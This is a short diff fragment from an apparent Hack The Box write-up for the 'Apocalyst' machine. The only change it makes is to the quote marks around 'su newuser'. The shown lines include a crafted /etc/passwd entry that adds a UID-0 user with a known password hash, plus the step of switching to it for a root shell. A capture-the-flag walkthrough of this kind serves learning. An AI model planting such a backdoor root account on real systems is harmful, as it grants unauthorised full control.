Kyuu-Ji/htb-write-up/apocalyst/write-up-apocalyst.md

 newuser:$1$newuser$82ynj4089D97/6jtzM22O.:0:0:root:/root:/bin/bash
 ```

-Now we can switch with ´su newuser´ to the created user and start a root shell!
+Now we can switch with `su newuser` to the created user and start a root shell!